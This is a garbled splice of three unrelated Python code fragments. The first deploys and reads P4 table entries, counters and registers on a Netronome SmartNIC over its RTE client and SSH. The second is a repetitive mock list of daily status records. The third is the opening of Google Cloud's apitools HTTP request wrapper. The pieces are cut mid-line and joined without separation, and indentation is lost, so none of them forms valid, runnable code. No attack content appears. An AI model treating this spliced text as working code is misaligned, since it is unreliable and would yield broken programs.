["ingress::send", {"spec": host["p4_port"]}])
# dut -> +external host
if cfg["ext_host"] != "":
for loadgen_grp in cfg["loadgen_groups"]:
if loadgen_grp["use_group"] == "checked":
for dut in self.get_all_dut_dst_p4_ports(cfg, get_as_dict=True):
if dut["id"] == loadgen_grp["group"]:
table_entry_add("ingress::t_extHost",
"dut{}_grp_".format(dut["id"], loadgen_grp["group"]),
{"standard_metadata.ingress_port": dut["p4_port"]},
["ingress::send_if_extHost",
{"spec": "mg{}".format(loadgen_grp["mcast_grp"])}])
break
# Change MAC for packages to external host
table_entry_add("egress::t_change_mac", "extHost",
{"standard_metadata.egress_port": cfg["ext_host"]},
["egress::change_mac", {"dstAddr": "ff:ff:ff:ff:ff:ff"}])
# Enable MAC command on physical ports if hardware stamping is activated
EgCmdPrependEn = 0
ports = self.port_lists()
for token, i in zip(ports['real_ports'], ports['logical_ports']):
if token.startswith("p"):
table_entry_add("egress::t_add_empty_nfp_mac_eg_cmd", token,
{"standard_metadata.egress_port": i},
["egress::add_empty_nfp_mac_eg_cmd", {}])
EgCmdPrependEn |= 0xff << (8 * int(i))
sshstr = "sudo /opt/netronome/bin/nfp-reg xpb:Nbi0IsldXpbMap.NbiTopXpbMap.MacGlbAdrMap.MacCsr.EgCmdPrependEn0Lo={0}; sudo /opt/netronome/bin/nfp-reg xpb:Nbi0IsldXpbMap.NbiTopXpbMap.MacGlbAdrMap.MacCsr.EgCmdPrependEn0Hi={1}".format(hex(EgCmdPrependEn & 0xffffffff), hex(EgCmdPrependEn >> 32 & 0xffffffff))
self.execute_ssh(cfg, sshstr)
# Timestamp on dut ports
protos = []
if cfg["stamp_tcp"] == "checked":
protos.append(["tcp", "0x06"])
if cfg["stamp_udp"] == "checked":
protos.append(["udp", "0x11"])
for dut in cfg["dut_ports"]:
if dut["stamp_outgoing"] == "checked" and dut["use_port"] == "checked":
for proto in protos:
table_entry_add("egress::t_timestamp1", "dut{}_{}".format(dut["id"], proto[0]),
{"standard_metadata.egress_port": dut["p4_port"],
"ipv4.protocol": proto[1]},
["egress::timestamp1_{0}_mac".format(proto[0]), {}])
table_entry_add("egress::t_stamped_throughput_egress", "dut{}_{}".format(dut["id"], proto[0]),
{"standard_metadata.egress_port": dut["p4_port"],
"ipv4.protocol": proto[1]},
["egress::c_stamped_throughput_egress_count", {"index": dut["id"] - 1}])
for dut in self.get_all_dut_dst_p4_ports(cfg, get_as_dict=True):
table_entry_add("ingress::t_stamped_throughput_ingress",
"dut{}".format(str(dut["id"])),
{"standard_metadata.ingress_port": dut["p4_port"]},
["ingress::c_stamped_throughput_ingress_count",
{"index": dut["id"] - 1}]) # -1 because IDs start at 1 but index at 0
for proto in protos:
table_entry_add("ingress::t_timestamp2",
"dut{}_{}".format(str(dut["id"]), proto[0]),
{"standard_metadata.ingress_port": dut["p4_port"],
"ipv4.protocol": proto[1]},
["ingress::timestamp2_{0}".format(proto[0]), {}])
i = len(cfg["dut_ports"])
for loadgen_grp in cfg["loadgen_groups"]:
for host in loadgen_grp["loadgens"]:
for proto in protos:
table_entry_add("egress::t_stamped_throughput_egress",
"host{}_{}_{}".format(host["id"], loadgen_grp["group"], proto[0]),
{"standard_metadata.egress_port": host["p4_port"],
"ipv4.protocol": proto[1]},
["egress::c_stamped_throughput_egress_count", {"index": i}])
i = i + 1
for proto in protos:
table_entry_add("egress::t_stamped_throughput_egress", "ext_host_" + proto[1],
{"standard_metadata.egress_port": cfg["ext_host"],
"ipv4.protocol": proto[1]},
["egress::c_stamped_throughput_egress_count", {"index": i}])
# Measure throughput
for g in ["ingress", "egress"]:
for dut in cfg["dut_ports"]:
table_entry_add("{0}::t_throughput_{0}".format(g), "dut{}".format(dut["id"]),
{"standard_metadata.{0}_port".format(g): dut["p4_port"]},
["{0}::c_throughput_{0}_count".format(g), {"index": dut["id"] - 1}])
i = len(cfg["dut_ports"])
for loadgen_grp in cfg["loadgen_groups"]:
for host in loadgen_grp["loadgens"]:
table_entry_add("{0}::t_throughput_{0}".format(g), "lg{}".format(i - (len(cfg["dut_ports"]) + 1)),
{"standard_metadata.{0}_port".format(g): host["p4_port"]},
["{0}::c_throughput_{0}_count".format(g), {"index": i}])
i = i + 1
# last index for ext host counter
table_entry_add("{0}::t_throughput_{0}".format(g), "lg{}".format(i - (len(cfg["dut_ports"]) + 1)),
{"standard_metadata.{0}_port".format(g): cfg["ext_host"]},
["{0}::c_throughput_{0}_count".format(g), {"index": i}])
except:
return traceback.format_exc()
print("DEPLOY FINISHED AT NETRONOME")
def read_p4_device(self, cfg):
rte_client = self._get_rte_client(cfg)
try:
registers = {r.name: r for r in rte_client.register_list_all()}
counters = {c.name: c for c in rte_client.p4_counter_list_all()}
except:
registers = {}
counters = {}
def read_reg(reg):
try:
ret = rte_client.register_retrieve(RegisterArrayArg(reg_id=registers[reg].id))
return dict(enumerate([int(val, 16) for val in ret]))
except:
return {}
def read_cnt(cnt):
try:
pck = rte_client.p4_counter_retrieve(counters[cnt + "_packets"].id)
byt = rte_client.p4_counter_retrieve(counters[cnt + "_bytes"].id)
pck_dict = dict(enumerate([i[0] for i in struct.iter_unpack('Q', pck.data)]))
byt_dict = dict(enumerate([i[0] for i in struct.iter_unpack('Q', byt.data)]))
return [pck_dict, byt_dict]
except:
print(traceback.format_exc())
return [{}, {}]
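# The RTE returns each P4 counter as two byte blobs (<name>_packets and
# <name>_bytes); struct.iter_unpack('Q', ...) above decodes them as arrays of
# unsigned 64-bit values, keyed by counter index in the returned dicts.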
cfg["total_deltas"] = read_reg("r_delta_sum").get(0, -1)
cfg["delta_counter"] = read_reg("r_delta_count").get(0, -1)
cfg["min_delta"] = read_reg("r_delta_min").get(0, -1)
cfg["max_delta"] = read_reg("r_delta_max").get(0, -1)
c_throughput_ingress = read_cnt("c_throughput_ingress")
c_throughput_egress = read_cnt("c_throughput_egress")
c_stamped_throughput_ingress = read_cnt("c_stamped_throughput_ingress")
c_stamped_throughput_egress = read_cnt("c_stamped_throughput_egress")
error_val = 0
for dut in cfg["dut_ports"]:
i = dut["id"] - 1
dut["num_ingress_packets"] = c_throughput_ingress[0].get(i, error_val)
dut["num_ingress_bytes"] = c_throughput_ingress[1].get(i, error_val)
dut["num_egress_packets"] = c_throughput_egress[0].get(i, error_val)
dut["num_egress_bytes"] = c_throughput_egress[1].get(i, error_val)
dut["num_ingress_stamped_packets"] = c_stamped_throughput_ingress[0].get(i, error_val)
dut["num_ingress_stamped_bytes"] = c_stamped_throughput_ingress[1].get(i, error_val)
dut["num_egress_stamped_packets"] = c_stamped_throughput_egress[0].get(i, error_val)
dut["num_egress_stamped_bytes"] = c_stamped_throughput_egress[1].get(i, error_val)
i = len(cfg["dut_ports"])
for loadgen_grp in cfg["loadgen_groups"]:
for host in loadgen_grp["loadgens"]:
host["num_ingress_packets"] = c_throughput_ingress[0].get(i, error_val)
host["num_ingress_bytes"] = c_throughput_ingress[1].get(i, error_val)
host["num_egress_packets"] = c_throughput_egress[0].get(i, error_val)
host["num_egress_bytes"] = c_throughput_egress[1].get(i, error_val)
host["num_ingress_stamped_packets"] = c_stamped_throughput_ingress[0].get(i, error_val)
host["num_ingress_stamped_bytes"] = c_stamped_throughput_ingress[1].get(i, error_val)
host["num_egress_stamped_packets"] = c_stamped_throughput_egress[0].get(i, error_val)
host["num_egress_stamped_bytes"] = c_stamped_throughput_egress[1].get(i, error_val)
i = i + 1
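        # Ingress counters for the external host are not read back here and are reported
        # as 0; only its egress counters at the final index are retrieved.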
cfg["ext_host_" + "num_ingress_packets"] = 0
cfg["ext_host_" + "num_ingress_bytes"] = 0
cfg["ext_host_" + "num_ingress_stamped_packets"] = 0
cfg["ext_host_" + "num_ingress_stamped_bytes"] = 0
cfg["ext_host_" + "num_egress_packets"] = c_throughput_egress[0].get(i, error_val)
cfg["ext_host_" + "num_egress_bytes"] = c_throughput_egress[1].get(i, error_val)
cfg["ext_host_" + "num_egress_stamped_packets"] = c_stamped_throughput_egress[0].get(i, error_val)
cfg["ext_host_" + "num_egress_stamped_bytes"] = c_stamped_throughput_egress[1].get(i, error_val)
return cfg
def p4_dev_status(self, cfg):
try:
rte_client = self._get_rte_client(cfg)
status = rte_client.design_load_status()
if status.is_loaded:
print("Netronome : device status is: is_loaded==True")
print(status)
uptime = status.uptime
try:
uptime = int(uptime)
if uptime >= 3600:
formatted_uptime = str(int(uptime/3600)) + "h " + str(int((uptime%3600) / 60)) + "min " + str(uptime % 60) + "s"
elif uptime >= 60:
formatted_uptime = str(int(uptime/60)) + "min " + str(uptime%60) + "s"
else:
formatted_uptime = str(uptime) + "s"
except:
formatted_uptime = uptime
dev_status = "{} {} ({}) for {}".format(status.uuid, status.frontend_source, status.frontend_build_date, formatted_uptime)
n = 0
for table in rte_client.table_list_all():
n = n + len(rte_client.table_retrieve(table.tbl_id))
return ["Number of table rules: {}".format(n)], status.is_loaded, dev_status
else:
print("Netronome: device status: is_loaded==False")
print(status)
except:
pass
return [], False, "not running (starting may take a while)"
# starts specific p4 software on device
def start_p4_dev_software(self, cfg):
rte_client = self._get_rte_client(cfg)
        with open(cfg["nfpfw"], "rb") as f:
            nfpfw = f.read()
        with open(cfg["pif_design_json"], "rb") as f:
            pif_design_json = f.read()
{'date': 'dayd9', 'status': 'warning'},
{'date': 'dayd0', 'status': 'ok'},
{'date': 'dayd11', 'status': 'ok'},
{'date': 'dayd12', 'status': 'noexec'}
]},
{'name': 'name-a4', 'data': [
{'date': 'day1', 'status': 'warning'},
{'date': 'day2', 'status': 'ok'},
{'date': 'day3', 'status': 'ok'},
{'date': 'day4', 'status': 'ok'},
{'date': 'day5', 'status': 'warning'},
{'date': 'day6', 'status': 'fail'},
{'date': 'day7', 'status': 'ok'},
{'date': 'day8', 'status': 'ok'},
{'date': 'day9', 'status': 'warning'},
{'date': 'day0', 'status': 'ok'},
{'date': 'day11', 'status': 'ok'},
{'date': 'day12', 'status': 'noexec'},
{'date': 'daya1', 'status': 'warning'},
{'date': 'daya2', 'status': 'ok'},
{'date': 'daya3', 'status': 'ok'},
{'date': 'daya4', 'status': 'ok'},
{'date': 'daya5', 'status': 'warning'},
{'date': 'daya6', 'status': 'fail'},
{'date': 'daya7', 'status': 'ok'},
{'date': 'daya8', 'status': 'ok'},
{'date': 'daya9', 'status': 'warning'},
{'date': 'daya0', 'status': 'ok'},
{'date': 'daya11', 'status': 'ok'},
{'date': 'daya12', 'status': 'noexec'},
{'date': 'dayb1', 'status': 'warning'},
{'date': 'dayb2', 'status': 'ok'},
{'date': 'dayb3', 'status': 'ok'},
{'date': 'dayb4', 'status': 'ok'},
{'date': 'dayb5', 'status': 'warning'},
{'date': 'dayb6', 'status': 'fail'},
{'date': 'dayb7', 'status': 'ok'},
{'date': 'dayb8', 'status': 'ok'},
{'date': 'dayb9', 'status': 'warning'},
{'date': 'dayb0', 'status': 'ok'},
{'date': 'dayb11', 'status': 'ok'},
{'date': 'dayb12', 'status': 'noexec'},
{'date': 'dayc1', 'status': 'warning'},
{'date': 'dayc2', 'status': 'ok'},
{'date': 'dayc3', 'status': 'ok'},
{'date': 'dayc4', 'status': 'ok'},
{'date': 'dayc5', 'status': 'warning'},
{'date': 'dayc6', 'status': 'fail'},
{'date': 'dayc7', 'status': 'ok'},
{'date': 'dayc8', 'status': 'ok'},
{'date': 'dayc9', 'status': 'warning'},
{'date': 'dayc0', 'status': 'ok'},
{'date': 'dayc11', 'status': 'ok'},
{'date': 'dayc12', 'status': 'noexec'},
{'date': 'dayd1', 'status': 'warning'},
{'date': 'dayd2', 'status': 'ok'},
{'date': 'dayd3', 'status': 'ok'},
{'date': 'dayd4', 'status': 'ok'},
{'date': 'dayd5', 'status': 'warning'},
{'date': 'dayd6', 'status': 'fail'},
{'date': 'dayd7', 'status': 'ok'},
{'date': 'dayd8', 'status': 'ok'},
{'date': 'dayd9', 'status': 'warning'},
{'date': 'dayd0', 'status': 'ok'},
{'date': 'dayd11', 'status': 'ok'},
{'date': 'dayd12', 'status': 'noexec'}
]},
{'name': 'name-a5', 'data': [
{'date': 'day1', 'status': 'warning'},
{'date': 'day2', 'status': 'ok'},
{'date': 'day3', 'status': 'ok'},
{'date': 'day4', 'status': 'ok'},
{'date': 'day5', 'status': 'warning'},
{'date': 'day6', 'status': 'fail'},
{'date': 'day7', 'status': 'ok'},
{'date': 'day8', 'status': 'ok'},
{'date': 'day9', 'status': 'warning'},
{'date': 'day0', 'status': 'ok'},
{'date': 'day11', 'status': 'ok'},
{'date': 'day12', 'status': 'noexec'},
{'date': 'daya1', 'status': 'warning'},
{'date': 'daya2', 'status': 'ok'},
{'date': 'daya3', 'status': 'ok'},
{'date': 'daya4', 'status': 'ok'},
{'date': 'daya5', 'status': 'warning'},
{'date': 'daya6', 'status': 'fail'},
{'date': 'daya7', 'status': 'ok'},
{'date': 'daya8', 'status': 'ok'},
{'date': 'daya9', 'status': 'warning'},
{'date': 'daya0', 'status': 'ok'},
{'date': 'daya11', 'status': 'ok'},
{'date': 'daya12', 'status': 'noexec'},
{'date': 'dayb1', 'status': 'warning'},
{'date': 'dayb2', 'status': 'ok'},
{'date': 'dayb3', 'status': 'ok'},
{'date': 'dayb4', 'status': 'ok'},
{'date': 'dayb5', 'status': 'warning'},
{'date': 'dayb6', 'status': 'fail'},
{'date': 'dayb7', 'status': 'ok'},
{'date': 'dayb8', 'status': 'ok'},
{'date': 'dayb9', 'status': 'warning'},
{'date': 'dayb0', 'status': 'ok'},
{'date': 'dayb11', 'status': 'ok'},
{'date': 'dayb12', 'status': 'noexec'},
{'date': 'dayc1', 'status': 'warning'},
{'date': 'dayc2', 'status': 'ok'},
{'date': 'dayc3', 'status': 'ok'},
{'date': 'dayc4', 'status': 'ok'},
{'date': 'dayc5', 'status': 'warning'},
{'date': 'dayc6', 'status': 'fail'},
{'date': 'dayc7', 'status': 'ok'},
{'date': 'dayc8', 'status': 'ok'},
{'date': 'dayc9', 'status': 'warning'},
{'date': 'dayc0', 'status': 'ok'},
{'date': 'dayc11', 'status': 'ok'},
{'date': 'dayc12', 'status': 'noexec'},
{'date': 'dayd1', 'status': 'warning'},
{'date': 'dayd2', 'status': 'ok'},
{'date': 'dayd3', 'status': 'ok'},
{'date': 'dayd4', 'status': 'ok'},
{'date': 'dayd5', 'status': 'warning'},
{'date': 'dayd6', 'status': 'fail'},
{'date': 'dayd7', 'status': 'ok'},
{'date': 'dayd8', 'status': 'ok'},
{'date': 'dayd9', 'status': 'warning'},
{'date': 'dayd0', 'status': 'ok'},
{'date': 'dayd11', 'status': 'ok'},
{'date': 'dayd12', 'status': 'noexec'}
]},
{'name': 'name-a6', 'data': [
{'date': 'day1', 'status': 'warning'},
{'date': 'day2', 'status': 'ok'},
{'date': 'day3', 'status': 'ok'},
{'date': 'day4', 'status': 'ok'},
{'date': 'day5', 'status': 'warning'},
{'date': 'day6', 'status': 'fail'},
{'date': 'day7', 'status': 'ok'},
{'date': 'day8', 'status': 'ok'},
{'date': 'day9', 'status': 'warning'},
{'date': 'day0', 'status': 'ok'},
{'date': 'day11', 'status': 'ok'},
{'date': 'day12', 'status': 'noexec'},
{'date': 'daya1', 'status': 'warning'},
{'date': 'daya2', 'status': 'ok'},
{'date': 'daya3', 'status': 'ok'},
{'date': 'daya4', 'status': 'ok'},
{'date': 'daya5', 'status': 'warning'},
{'date': 'daya6', 'status': 'fail'},
{'date': 'daya7', 'status': 'ok'},
{'date': 'daya8', 'status': 'ok'},
{'date': 'daya9', 'status': 'warning'},
{'date': 'daya0', 'status': 'ok'},
{'date': 'daya11', 'status': 'ok'},
{'date': 'daya12', 'status': 'noexec'},
{'date': 'dayb1', 'status': 'warning'},
{'date': 'dayb2', 'status': 'ok'},
{'date': 'dayb3', 'status': 'ok'},
{'date': 'dayb4', 'status': 'ok'},
{'date': 'dayb5', 'status': 'warning'},
{'date': 'dayb6', 'status': 'fail'},
{'date': 'dayb7', 'status': 'ok'},
{'date': 'dayb8', 'status': 'ok'},
{'date': 'dayb9', 'status': 'warning'},
{'date': 'dayb0', 'status': 'ok'},
{'date': 'dayb11', 'status': 'ok'},
{'date': 'dayb12', 'status': 'noexec'},
{'date': 'dayc1', 'status': 'warning'},
{'date': 'dayc2', 'status': 'ok'},
{'date': 'dayc3', 'status': 'ok'},
{'date': 'dayc4', 'status': 'ok'},
{'date': 'dayc5', 'status': 'warning'},
{'date': 'dayc6', 'status': 'fail'},
{'date': 'dayc7', 'status': 'ok'},
{'date': 'dayc8', 'status': 'ok'},
{'date': 'dayc9', 'status': 'warning'},
{'date': 'dayc0', 'status': 'ok'},
{'date': 'dayc11', 'status': 'ok'},
{'date': 'dayc12', 'status': 'noexec'},
{'date': 'dayd1', 'status': 'warning'},
{'date': 'dayd2', 'status': 'ok'},
{'date': 'dayd3', 'status': 'ok'},
{'date': 'dayd4', 'status': 'ok'},
{'date': 'dayd5', 'status': 'warning'},
{'date': 'dayd6', 'status': 'fail'},
{'date': 'dayd7', 'status': 'ok'},
{'date': 'dayd8', 'status': 'ok'},
{'date': 'dayd9', 'status': 'warning'},
{'date': 'dayd0', 'status': 'ok'},
{'date': 'dayd11', 'status': 'ok'},
{'date': 'dayd12', 'status': 'noexec'}
]},
{'name': 'name-a7', 'data': [
{'date': 'day1', 'status': 'warning'},
{'date': 'day2', 'status': 'ok'},
{'date': 'day3', 'status': 'ok'},
{'date': 'day4', 'status': 'ok'},
{'date': 'day5', 'status': 'warning'},
{'date': 'day6', 'status': 'fail'},
{'date': 'day7', 'status': 'ok'},
{'date': 'day8', 'status': 'ok'},
{'date': 'day9', 'status': 'warning'},
{'date': 'day0', 'status': 'ok'},
{'date': 'day11', 'status': 'ok'},
{'date': 'day12', 'status': 'noexec'},
{'date': 'daya1', 'status': 'warning'},
{'date': 'daya2', 'status': 'ok'},
{'date': 'daya3', 'status': 'ok'},
{'date': 'daya4', 'status': 'ok'},
{'date': 'daya5', 'status': 'warning'},
{'date': 'daya6', 'status': 'fail'},
{'date': 'daya7', 'status': 'ok'},
{'date': 'daya8', 'status': 'ok'},
{'date': 'daya9', 'status': 'warning'},
{'date': 'daya0', 'status': 'ok'},
{'date': 'daya11', 'status': 'ok'},
{'date': 'daya12', 'status': 'noexec'},
{'date': 'dayb1', 'status': 'warning'},
{'date': 'dayb2', 'status': 'ok'},
{'date': 'dayb3', 'status': 'ok'},
{'date': 'dayb4', 'status': 'ok'},
{'date': 'dayb5', 'status': 'warning'},
{'date': 'dayb6', 'status': 'fail'},
{'date': 'dayb7', 'status': 'ok'},
{'date': 'dayb8', 'status': 'ok'},
{'date': 'dayb9', 'status': 'warning'},
{'date': 'dayb0', 'status': 'ok'},
{'date': 'dayb11', 'status': 'ok'},
{'date': 'dayb12', 'status': 'noexec'},
{'date': 'dayc1', 'status': 'warning'},
{'date': 'dayc2', 'status': 'ok'},
{'date': 'dayc3', 'status': 'ok'},
{'date': 'dayc4', 'status': 'ok'},
{'date': 'dayc5', 'status': 'warning'},
{'date': 'dayc6', 'status': 'fail'},
{'date': 'dayc7', 'status': 'ok'},
{'date': 'dayc8', 'status': 'ok'},
{'date': 'dayc9', 'status': 'warning'},
{'date': 'dayc0', 'status': 'ok'},
{'date': 'dayc11', 'status': 'ok'},
{'date': 'dayc12', 'status': 'noexec'},
{'date': 'dayd1', 'status': 'warning'},
{'date': 'dayd2', 'status': 'ok'},
{'date': 'dayd3', 'status': 'ok'},
{'date': 'dayd4', 'status': 'ok'},
{'date': 'dayd5', 'status': 'warning'},
{'date': 'dayd6', 'status': 'fail'},
{'date': 'dayd7', 'status': 'ok'},
{'date': 'dayd8', 'status': 'ok'},
{'date': 'dayd9', 'status': 'warning'},
{'date': 'dayd0', 'status': 'ok'},
{'date': 'dayd11', 'status': 'ok'},
{'date': 'dayd12', 'status': 'noexec'}
]},
{'name': 'name-a8', 'data': [
{'date': 'day1', 'status': 'warning'},
{'date': 'day2', 'status': 'ok'},
{'date': 'day3', 'status': 'ok'},
{'date': 'day4', 'status': 'ok'},
{'date': 'day5', 'status': 'warning'},
{'date': 'day6', 'status': 'fail'},
{'date': 'day7', 'status': 'ok'},
{'date': 'day8', 'status': 'ok'},
{'date': 'day9', 'status': 'warning'},
{'date': 'day0', 'status': 'ok'},
{'date': 'day11', 'status': 'ok'},
{'date': 'day12', 'status': 'noexec'},
{'date': 'daya1', 'status': 'warning'},
{'date': 'daya2', 'status': 'ok'},
{'date': 'daya3', 'status': 'ok'},
{'date': 'daya4', 'status': 'ok'},
{'date': 'daya5', 'status': 'warning'},
{'date': 'daya6', 'status': 'fail'},
{'date': 'daya7', 'status': 'ok'},
{'date': 'daya8', 'status': 'ok'},
{'date': 'daya9', 'status': 'warning'},
{'date': 'daya0', 'status': 'ok'},
{'date': 'daya11', 'status': 'ok'},
{'date': 'daya12', 'status': 'noexec'},
{'date': 'dayb1', 'status': 'warning'},
{'date': 'dayb2', 'status': 'ok'},
{'date': 'dayb3', 'status': 'ok'},
{'date': 'dayb4', 'status': 'ok'},
{'date': 'dayb5', 'status': 'warning'},
{'date': 'dayb6', 'status': 'fail'},
{'date': 'dayb7', 'status': 'ok'},
{'date': 'dayb8', 'status': 'ok'},
{'date': 'dayb9', 'status': 'warning'},
{'date': 'dayb0', 'status': 'ok'},
{'date': 'dayb11', 'status': 'ok'},
{'date': 'dayb12', 'status': 'noexec'},
{'date': 'dayc1', 'status': 'warning'},
{'date': 'dayc2', 'status': 'ok'},
{'date': 'dayc3', 'status': 'ok'},
{'date': 'dayc4', 'status': 'ok'},
{'date': 'dayc5', 'status': 'warning'},
{'date': 'dayc6', 'status': 'fail'},
{'date': 'dayc7', 'status': 'ok'},
{'date': 'dayc8', 'status': 'ok'},
{'date': 'dayc9', 'status': 'warning'},
{'date': 'dayc0', 'status': 'ok'},
{'date': 'dayc11', 'status': 'ok'},
{'date': 'dayc12', 'status': 'noexec'},
{'date': 'dayd1', 'status': 'warning'},
{'date': 'dayd2', 'status': 'ok'},
{'date': 'dayd3', 'status': 'ok'},
{'date': 'dayd4', 'status': 'ok'},
{'date': 'dayd5', 'status': 'warning'},
{'date': 'dayd6', 'status': 'fail'},
{'date': 'dayd7', 'status': 'ok'},
{'date': 'dayd8', 'status': 'ok'},
{'date': 'dayd9', 'status': 'warning'},
{'date': 'dayd0', 'status': 'ok'},
{'date': 'dayd11', 'status': 'ok'},
{'date': 'dayd12', 'status': 'noexec'}
]},
{'name': 'name-a9', 'data': [
{'date': 'day1', 'status': 'warning'},
{'date': 'day2', 'status': 'ok'},
{'date': 'day3', 'status': 'ok'},
{'date': 'day4', 'status': 'ok'},
{'date': 'day5', 'status': 'warning'},
{'date': 'day6', 'status': 'fail'},
{'date': 'day7', 'status': 'ok'},
{'date': 'day8', 'status': 'ok'},
            {'date': 'day9',
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""HTTP wrapper for apitools.
This library wraps the underlying http library we use, which is
currently :mod:`httplib2`.
"""
import collections
import contextlib
import logging
import socket
import time
import httplib2
import six
from six.moves import http_client
from six.moves.urllib import parse
from google.cloud.streaming.exceptions import BadStatusCodeError
from google.cloud.streaming.exceptions import RequestError
from google.cloud.streaming.exceptions import RetryAfterError
from google.cloud.streaming.util import calculate_wait_for_retry
_REDIRECTIONS = 5
# 308 and 429 don't have names in httplib.
RESUME_INCOMPLETE = 308
TOO_MANY_REQUESTS = 429
_REDIRECT_STATUS_CODES = (
http_client.MOVED_PERMANENTLY,
http_client.FOUND,
http_client.SEE_OTHER,
http_client.TEMPORARY_REDIRECT,
RESUME_INCOMPLETE,
)
_RETRYABLE_EXCEPTIONS = (
http_client.BadStatusLine,
http_client.IncompleteRead,
http_client.ResponseNotReady,
socket.error,
httplib2.ServerNotFoundError,
ValueError,
RequestError,
BadStatusCodeError,
RetryAfterError,
)
@contextlib.contextmanager
def _httplib2_debug_level(http_request, level, http=None):
"""Temporarily change the value of httplib2.debuglevel, if necessary.
If http_request has a `loggable_body` distinct from `body`, then we
need to prevent httplib2 from logging the full body. This sets
httplib2.debuglevel for the duration of the `with` block; however,
that alone won't change the value of existing HTTP connections. If
an httplib2.Http object is provided, we'll also change the level on
any cached connections attached to it.
:type http_request: :class:`Request`
:param http_request: the request to be logged.
:type level: int
:param level: the debuglevel for logging.
:type http: :class:`httplib2.Http`
:param http:
(Optional) the instance on whose connections to set the debuglevel.
"""
if http_request.loggable_body is None:
yield
return
old_level = httplib2.debuglevel
http_levels = {}
httplib2.debuglevel = level
if http is not None and getattr(http, 'connections', None) is not None:
for connection_key, connection in http.connections.items():
# httplib2 stores two kinds of values in this dict, connection
# classes and instances. Since the connection types are all
# old-style classes, we can't easily distinguish by connection
# type -- so instead we use the key pattern.
if ':' not in connection_key:
continue
http_levels[connection_key] = connection.debuglevel
connection.set_debuglevel(level)
yield
httplib2.debuglevel = old_level
if http is not None:
for connection_key, old_level in http_levels.items():
http.connections[connection_key].set_debuglevel(old_level)
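# Usage sketch (hypothetical call site; `data` and `http` are assumptions, not part of
# this module):
#
#     request = Request(url='http://example.invalid/upload', http_method='POST', body=data)
#     request.loggable_body = '<media body>'  # the level is only changed when this is set
#     with _httplib2_debug_level(request, 4, http=http):
#         ...  # connections cached on `http` log at debuglevel 4 inside this block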
class Request(object):
"""Encapsulates the data for an HTTP request.
:type url: str
:param url: the URL for the request
:type http_method: str
:param http_method: the HTTP method to use for the request
:type headers: mapping
:param headers: (Optional) headers to be sent with the request
:type body: str
:param body: body to be sent with the request
"""
def __init__(self, url='', http_method='GET', headers=None, body=''):
self.url = url
self.http_method = http_method
self.headers = headers or {}
self._body = None
self._loggable_body = None
self.body = body
@property
def loggable_body(self):
"""Request body for logging purposes
:rtype: str
:returns: The body to be logged.
"""
return self._loggable_body
@loggable_body.setter
def loggable_body(self, value):
"""Update request body for logging purposes
:type value: str
:param value: updated body
:raises: :exc:`RequestError` if the request does not have a body.
"""
if self.body is None:
raise RequestError(
'Cannot set loggable body on request with no body')
self._loggable_body = value
@property
def body(self):
"""Request body
:rtype: str
:returns: The body of the request.
"""
return self._body
@body.setter
def body(self, value):
"""Update the request body
Handles logging and length measurement.
:type value: str
:param value: updated body
"""
self._body = value
if value is not None:
            # Prefer a 'length' attribute over len(), since len() cannot report
            # sizes above 4GiB on 32-bit Python.
body_length = getattr(
self._body, 'length', None) or len(self._body)
self.headers['content-length'] = str(body_length)
else:
self.headers.pop('content-length', None)
# This line ensures we don't try to print large requests.
if not isinstance(value, (type(None), six.string_types)):
self.loggable_body = '<media body>'
def _process_content_range(content_range):
"""Convert a 'Content-Range' header into a length for the response.
Helper for :meth:`Response.length`.
:type content_range: str
:param content_range: the header value being parsed.
:rtype: int
:returns: the length of the response chunk.
"""
_, _, range_spec = content_range.partition(' ')
byte_range, _, _ = range_spec.partition('/')
start, _, end = byte_range.partition('-')
return int(end) - int(start) + 1
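# Example (sketch): _process_content_range('bytes 0-99/1234') returns 100.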
# Note: currently the order of fields here is important, since we want
# to be able to pass in the result from httplib2.request.
_ResponseTuple = collections.namedtuple(
'HttpResponse', ['info', 'content', 'request_url'])
class Response(_ResponseTuple):
"""Encapsulates data for an HTTP response.
"""
__slots__ = ()
def __len__(self):
return self.length
@property
def length(self):
"""Length of this response.
Exposed as an attribute since using ``len()`` directly can fail
for responses larger than ``sys.maxint``.
:rtype: int or long
:returns: The length of the response.
"""
if 'content-encoding' in self.info and 'content-range' in self.info:
# httplib2 rewrites content-length in the case of a compressed
# transfer; we can't trust the content-length header in that
# case, but we *can* trust content-range, if it's present.
return _process_content_range(self.info['content-range'])
elif 'content-length' in self.info:
return int(self.info.get('content-length'))
elif 'content-range' in self.info:
return _process_content_range(self.info['content-range'])
return len(self.content)
@property
def status_code(self):
"""HTTP status code
:rtype: int
:returns: The response status code.
"""
return int(self.info['status'])
@property
def retry_after(self):
"""Retry interval (if set).
:rtype: int
:returns: interval in seconds
"""
if 'retry-after' in self.info:
return int(self.info['retry-after'])
@property
def is_redirect(self):
"""Does this response contain a redirect
:rtype: bool
:returns: True if the status code indicates a redirect and the
'location' header is present.
"""
return (self.status_code in _REDIRECT_STATUS_CODES and
'location' in self.info)
def _check_response(response):
"""Validate a response
:type response: :class:`Response`
:param response: the response to validate
:raises: :exc:`google.cloud.streaming.exceptions.RequestError` if response
is None, :exc:`~.exceptions.BadStatusCodeError` if response status
code indicates an error, or :exc:`~.exceptions.RetryAfterError`
if response indicates a retry interval.
"""
if response is None:
# Caller shouldn't call us if the response is None, but handle anyway.
raise RequestError(
'Request did not return a response.')
elif (response.status_code >= 500 or
response.status_code == TOO_MANY_REQUESTS):
raise BadStatusCodeError.from_response(response)
elif response.retry_after:
raise RetryAfterError.from_response(response)
def _reset_http_connections(http):
"""Rebuild all http connections in the httplib2.Http instance.
httplib2 overloads the map in http.connections to contain two different
types of values:
{ scheme string: connection class } and
{ scheme + authority string : actual http connection }
Here we remove all of the entries for actual connections so that on the
next request httplib2 will rebuild them from the connection types.
:type http: :class:`httplib2.Http`
:param http: the instance whose connections are to be rebuilt
"""
if getattr(http, 'connections', None):
for conn_key in list(http.connections.keys()):
if ':' in conn_key:
del http.connections[conn_key]
def _make_api_request_no_retry(http, http_request, redirections=_REDIRECTIONS):
"""Send an HTTP request via the given http instance.
This wrapper exists to handle translation between the plain httplib2
request/response types and the Request and Response types above.
:type http: :class:`httplib2.Http`
    :param http: an instance which implements the `Http` API.
:type http_request: :class:`Request`
